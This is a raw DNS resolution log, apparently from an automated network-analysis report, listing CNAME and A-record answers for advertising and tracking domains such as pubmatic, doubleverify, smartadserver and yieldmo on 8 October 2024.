                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.224632978 CEST1.1.1.1192.168.2.40x2f09No error (0)cs.yellowblue.io52.16.49.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.224632978 CEST1.1.1.1192.168.2.40x2f09No error (0)cs.yellowblue.io63.32.2.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.224632978 CEST1.1.1.1192.168.2.40x2f09No error (0)cs.yellowblue.io54.171.218.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.224632978 CEST1.1.1.1192.168.2.40x2f09No error (0)cs.yellowblue.io52.17.229.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.270957947 CEST1.1.1.1192.168.2.40x8646No error (0)rtbc-ew1.doubleverify.com130.211.44.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.428180933 CEST1.1.1.1192.168.2.40xdbd6No error (0)tpsc-ew1.doubleverify.com130.211.44.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.554095984 CEST1.1.1.1192.168.2.40x5c3dNo error (0)ads.pubmatic.compubmatic.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.555025101 CEST1.1.1.1192.168.2.40xd2edNo error (0)ads.pubmatic.compubmatic.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.582881927 CEST1.1.1.1192.168.2.40x71f1No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.582881927 CEST1.1.1.1192.168.2.40x71f1No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.582881927 CEST1.1.1.1192.168.2.40x71f1No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.582881927 CEST1.1.1.1192.168.2.40x71f1No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.249.181.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.582881927 CEST1.1.1.1192.168.2.40x71f1No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.16.68.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.582881927 CEST1.1.1.1192.168.2.40x71f1No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.16.128.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.582881927 CEST1.1.1.1192.168.2.40x71f1No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.247.205.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.582881927 CEST1.1.1.1192.168.2.40x71f1No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.19.118.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.582881927 CEST1.1.1.1192.168.2.40x71f1No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com108.128.136.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.582881927 CEST1.1.1.1192.168.2.40x71f1No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com99.80.175.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.582881927 CEST1.1.1.1192.168.2.40x71f1No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.72.106.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.583286047 CEST1.1.1.1192.168.2.40x7f22No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.583286047 CEST1.1.1.1192.168.2.40x7f22No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.583286047 CEST1.1.1.1192.168.2.40x7f22No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.623550892 CEST1.1.1.1192.168.2.40x22bfNo error (0)image2.pubmatic.comimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.623550892 CEST1.1.1.1192.168.2.40x22bfNo error (0)image2v2.pubmnet.compug-lhr-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.624113083 CEST1.1.1.1192.168.2.40x85a2No error (0)image2.pubmatic.comimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.624113083 CEST1.1.1.1192.168.2.40x85a2No error (0)image2v2.pubmnet.compug-ams-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.624113083 CEST1.1.1.1192.168.2.40x85a2No error (0)pug-ams-bc.pubmnet.com198.47.127.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.626753092 CEST1.1.1.1192.168.2.40xbfb8No error (0)tps.doubleverify.comtps-geo.dvgtm.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.626753092 CEST1.1.1.1192.168.2.40xbfb8No error (0)tpsc-ew1.doubleverify.com130.211.44.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.627305031 CEST1.1.1.1192.168.2.40x8c52No error (0)tps.doubleverify.comtps-geo.dvgtm.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.651721001 CEST1.1.1.1192.168.2.40xcaa7No error (0)simage2.pubmatic.comsimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.651721001 CEST1.1.1.1192.168.2.40xcaa7No error (0)simage2v2.pubmnet.compug-lhr-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.651721001 CEST1.1.1.1192.168.2.40xcaa7No error (0)pug-lhr-bc.pubmnet.com185.64.191.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.651773930 CEST1.1.1.1192.168.2.40xeef8No error (0)simage2.pubmatic.comsimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.651773930 CEST1.1.1.1192.168.2.40xeef8No error (0)simage2v2.pubmnet.compug-ams-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.660742998 CEST1.1.1.1192.168.2.40xae70No error (0)uipus.semasio.net50.57.31.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.668533087 CEST1.1.1.1192.168.2.40x376bNo error (0)c.evidon.comnewwildcard.evidon.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.669308901 CEST1.1.1.1192.168.2.40xcf10No error (0)c.evidon.comnewwildcard.evidon.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.194936037 CEST1.1.1.1192.168.2.40x2bffNo error (0)simage4.pubmatic.comimage4-v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.194936037 CEST1.1.1.1192.168.2.40x2bffNo error (0)image4-v2.pubmnet.comspug-amsfpairbc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.194936037 CEST1.1.1.1192.168.2.40x2bffNo error (0)spug-amsfpairbc.pubmnet.com198.47.127.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.195174932 CEST1.1.1.1192.168.2.40x3553No error (0)simage4.pubmatic.comimage4-v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.195174932 CEST1.1.1.1192.168.2.40x3553No error (0)image4-v2.pubmnet.comspug-amsfpairbc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.224298000 CEST1.1.1.1192.168.2.40xe81aNo error (0)s2s.t13.io34.107.140.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.492345095 CEST1.1.1.1192.168.2.40xc06fNo error (0)exchange.mediavine.com52.57.181.208A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.492345095 CEST1.1.1.1192.168.2.40xc06fNo error (0)exchange.mediavine.com3.120.11.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.492345095 CEST1.1.1.1192.168.2.40xc06fNo error (0)exchange.mediavine.com52.28.29.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.492345095 CEST1.1.1.1192.168.2.40xc06fNo error (0)exchange.mediavine.com35.158.183.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.492345095 CEST1.1.1.1192.168.2.40xc06fNo error (0)exchange.mediavine.com18.195.28.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.492345095 CEST1.1.1.1192.168.2.40xc06fNo error (0)exchange.mediavine.com3.121.28.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.668014050 CEST1.1.1.1192.168.2.40xc81aNo error (0)rtb-csync.smartadserver.comrtb-csync-geo.usersync-prod-sas.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.668014050 CEST1.1.1.1192.168.2.40xc81aNo error (0)rtb-csync-euw1.smartadserver.com89.149.193.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.668014050 CEST1.1.1.1192.168.2.40xc81aNo error (0)rtb-csync-euw1.smartadserver.com89.149.192.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.668014050 CEST1.1.1.1192.168.2.40xc81aNo error (0)rtb-csync-euw1.smartadserver.com81.17.55.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.668014050 CEST1.1.1.1192.168.2.40xc81aNo error (0)rtb-csync-euw1.smartadserver.com89.149.193.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.668014050 CEST1.1.1.1192.168.2.40xc81aNo error (0)rtb-csync-euw1.smartadserver.com89.149.193.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.668014050 CEST1.1.1.1192.168.2.40xc81aNo error (0)rtb-csync-euw1.smartadserver.com89.149.192.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.668014050 CEST1.1.1.1192.168.2.40xc81aNo error (0)rtb-csync-euw1.smartadserver.com89.149.193.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.668014050 CEST1.1.1.1192.168.2.40xc81aNo error (0)rtb-csync-euw1.smartadserver.com81.17.55.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.668014050 CEST1.1.1.1192.168.2.40xc81aNo error (0)rtb-csync-euw1.smartadserver.com81.17.55.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.668014050 CEST1.1.1.1192.168.2.40xc81aNo error (0)rtb-csync-euw1.smartadserver.com81.17.55.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.668014050 CEST1.1.1.1192.168.2.40xc81aNo error (0)rtb-csync-euw1.smartadserver.com89.149.193.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.668014050 CEST1.1.1.1192.168.2.40xc81aNo error (0)rtb-csync-euw1.smartadserver.com89.149.193.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.668014050 CEST1.1.1.1192.168.2.40xc81aNo error (0)rtb-csync-euw1.smartadserver.com81.17.55.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.668014050 CEST1.1.1.1192.168.2.40xc81aNo error (0)rtb-csync-euw1.smartadserver.com81.17.55.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.668014050 CEST1.1.1.1192.168.2.40xc81aNo error (0)rtb-csync-euw1.smartadserver.com89.149.192.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.668014050 CEST1.1.1.1192.168.2.40xc81aNo error (0)rtb-csync-euw1.smartadserver.com89.149.192.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.670195103 CEST1.1.1.1192.168.2.40x9611No error (0)rtb-csync.smartadserver.comrtb-csync-geo.usersync-prod-sas.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.776916981 CEST1.1.1.1192.168.2.40x4fb6No error (0)cs.yellowblue.io63.33.84.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.776916981 CEST1.1.1.1192.168.2.40x4fb6No error (0)cs.yellowblue.io52.17.229.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.776916981 CEST1.1.1.1192.168.2.40x4fb6No error (0)cs.yellowblue.io54.171.218.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.776916981 CEST1.1.1.1192.168.2.40x4fb6No error (0)cs.yellowblue.io54.76.188.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.776916981 CEST1.1.1.1192.168.2.40x4fb6No error (0)cs.yellowblue.io52.16.49.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:54.776916981 CEST1.1.1.1192.168.2.40x4fb6No error (0)cs.yellowblue.io63.32.2.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:55.121366978 CEST1.1.1.1192.168.2.40x1340No error (0)image4.pubmatic.comimage4-v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:55.121366978 CEST1.1.1.1192.168.2.40x1340No error (0)image4-v2.pubmnet.comspug-amsfpairbc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:55.121366978 CEST1.1.1.1192.168.2.40x1340No error (0)spug-amsfpairbc.pubmnet.com198.47.127.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:55.121824980 CEST1.1.1.1192.168.2.40xa821No error (0)image4.pubmatic.comimage4-v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:55.121824980 CEST1.1.1.1192.168.2.40xa821No error (0)image4-v2.pubmnet.comspug-lhrc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:56.261451006 CEST1.1.1.1192.168.2.40x4047No error (0)vidanalytics.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:56.261451006 CEST1.1.1.1192.168.2.40x4047No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:56.261451006 CEST1.1.1.1192.168.2.40x4047No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:56.261451006 CEST1.1.1.1192.168.2.40x4047No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:56.261451006 CEST1.1.1.1192.168.2.40x4047No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:56.262494087 CEST1.1.1.1192.168.2.40x3674No error (0)vidanalytics.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:58.335247993 CEST1.1.1.1192.168.2.40x31b7No error (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:58.338146925 CEST1.1.1.1192.168.2.40x89acNo error (0)ad.doubleclick.net142.250.184.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:02.210716963 CEST1.1.1.1192.168.2.40x64eNo error (0)csm.nl3.eu.criteo.netcsm.nl3.vip.prod.criteo.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:02.211610079 CEST1.1.1.1192.168.2.40x6169No error (0)csm.nl3.eu.criteo.netcsm.nl3.vip.prod.criteo.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:02.211610079 CEST1.1.1.1192.168.2.40x6169No error (0)csm.nl3.vip.prod.criteo.net178.250.1.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:05.194853067 CEST1.1.1.1192.168.2.40x2c9fNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:05.195491076 CEST1.1.1.1192.168.2.40xdedaNo error (0)www.google.com172.217.18.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:09.001903057 CEST1.1.1.1192.168.2.40xbb14No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:19.688967943 CEST1.1.1.1192.168.2.40xb365No error (0)pbs.yahoo.comedge-prebid-cdn.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:19.688967943 CEST1.1.1.1192.168.2.40xb365No error (0)edge-prebid-cdn.g03.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:19.688967943 CEST1.1.1.1192.168.2.40xb365No error (0)edge-prebid-cdn.g03.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:19.689903021 CEST1.1.1.1192.168.2.40x95d0No error (0)pbs.yahoo.comedge-prebid-cdn.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:25.087182045 CEST1.1.1.1192.168.2.40x95ebNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:25.087182045 CEST1.1.1.1192.168.2.40x95ebNo error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.027281046 CEST1.1.1.1192.168.2.40x31e5No error (0)ads.yieldmo.comrw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.027281046 CEST1.1.1.1192.168.2.40x31e5No error (0)rw.yieldmo.comgdpr.rw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.027281046 CEST1.1.1.1192.168.2.40x31e5No error (0)gdpr.rw.yieldmo.comrw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.028117895 CEST1.1.1.1192.168.2.40x5d0aNo error (0)ads.yieldmo.comrw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.028117895 CEST1.1.1.1192.168.2.40x5d0aNo error (0)rw.yieldmo.comgdpr.rw.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.028117895 CEST1.1.1.1192.168.2.40x5d0aNo error (0)gdpr.rw.yieldmo.comrw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.028117895 CEST1.1.1.1192.168.2.40x5d0aNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com52.209.79.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.028117895 CEST1.1.1.1192.168.2.40x5d0aNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com63.32.128.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.028117895 CEST1.1.1.1192.168.2.40x5d0aNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com34.255.72.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.028117895 CEST1.1.1.1192.168.2.40x5d0aNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com34.250.181.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.028117895 CEST1.1.1.1192.168.2.40x5d0aNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com34.249.224.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.028117895 CEST1.1.1.1192.168.2.40x5d0aNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com52.50.72.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.028117895 CEST1.1.1.1192.168.2.40x5d0aNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com52.210.114.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.028117895 CEST1.1.1.1192.168.2.40x5d0aNo error (0)rw-yieldmo-com-tf-362867385.eu-west-1.elb.amazonaws.com34.254.71.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.031567097 CEST1.1.1.1192.168.2.40x1eb9No error (0)fastlane.rubiconproject.comtagged-by.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.032085896 CEST1.1.1.1192.168.2.40xa954No error (0)fastlane.rubiconproject.comtagged-by.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.034118891 CEST1.1.1.1192.168.2.40xdc96No error (0)c2shb-oao.ssp.yahoo.comglobal-dtp-oao.ybp.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.034118891 CEST1.1.1.1192.168.2.40xdc96No error (0)global-dtp-oao.ybp.yahoo.comdtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.034456968 CEST1.1.1.1192.168.2.40xaca2No error (0)c2shb-oao.ssp.yahoo.comglobal-dtp-oao.ybp.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.034456968 CEST1.1.1.1192.168.2.40xaca2No error (0)global-dtp-oao.ybp.yahoo.comdtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.034456968 CEST1.1.1.1192.168.2.40xaca2No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud54.194.157.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.034456968 CEST1.1.1.1192.168.2.40xaca2No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud34.254.88.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:28.034456968 CEST1.1.1.1192.168.2.40xaca2No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud34.253.58.104A (IP address)IN (0x0001)false
